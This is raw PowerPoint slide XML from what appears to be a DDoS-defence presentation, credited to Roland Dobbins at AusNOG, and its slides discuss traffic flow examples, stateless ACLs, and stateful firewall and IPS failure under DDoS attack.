              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> port 80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16409" name="AutoShape 25"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="157449" y="5346541"/>
            <a:ext cx="3771900" cy="50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39688" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>192.168.4.85  to 172.19.21.144</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="39688" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> port 1024, TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> port 80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16410" name="AutoShape 26"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4468813" y="5446733"/>
            <a:ext cx="3771900" cy="50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39688" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>172.19.254.8  to 172.19.21.144</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="39688" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>TCP src port 1024, TCP dst port 80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874920" y="6506666"/>
            <a:ext cx="2909646" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>*Originally presented by Roland Dobbins at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>AusNOG</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78443222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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16391"/>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iterate type="lt">
                                    <p:tmPct val="100000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="16408"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="75"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16408"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="12" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="4475"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="100000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="16409"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="75"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16409"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="16" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="8525"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="17" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="100000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="16410"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="75"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16410"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="20" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="12575"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="21" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2000"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="16402"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16402"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="24" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="15075"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="25" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="16405"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16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8" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="16409" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="16410"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Firewalls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="1017587"/>
            <a:ext cx="8489904" cy="5306831"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>enforcement can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>be accomplished </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>via stateless ACLs in hardware-based routers and layer-3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>switches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There are mechanisms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in modern routers/switches </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>can to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>allow appropriate security team </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each inline device is a potential bottleneck for a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> attack to become successful</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2287832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7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222" y="901291"/>
            <a:ext cx="6179263" cy="4463322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20481" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="178441"/>
            <a:ext cx="8489904" cy="507831"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stateful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firewall &amp; IPS Failure Under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20482" name="AutoShape 2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4468813" y="6565900"/>
            <a:ext cx="255587" cy="236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584200"/>
            <a:fld id="{61CE8B1B-AC81-2A43-BB45-4B3DA2C17703}" type="slidenum">
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr" defTabSz="584200"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="AutoShape 3"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="5321323"/>
            <a:ext cx="8839200" cy="8398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marL="387350" indent="-387350" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="73AF44"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Over half </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>of all respondents have experienced a failure of their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>stateful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> firewalls or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>IPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> due to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> attack!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="432541235"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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813313"/>
            <a:ext cx="9144000" cy="584776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="da-DK" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF31"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Signatures Are Dead; Long Live Signatures</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7CBF31"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1042088"/>
            <a:ext cx="6205437" cy="4343806"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23845292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IPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="1017587"/>
            <a:ext cx="8489904" cy="5306831"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>IDS/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>IPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>devices suffer from the same state-exhaustion issues as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>stateful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> firewalls - but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>even more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>so</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
              <a:sym typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>TCP re-ordering required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Multiple packets likely needed for successful detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Deep parsing of HTTP required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Un-encoding required</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
              <a:sym typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14399776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ight Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5426749" y="3578723"/>
            <a:ext cx="3768175" cy="2118678"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="71B532">
              <a:alpha val="32000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="71B532"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="330200" dist="38100" algn="l" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prst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ight Arrow 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3304632" y="1907488"/>
            <a:ext cx="3768175" cy="2118678"/>
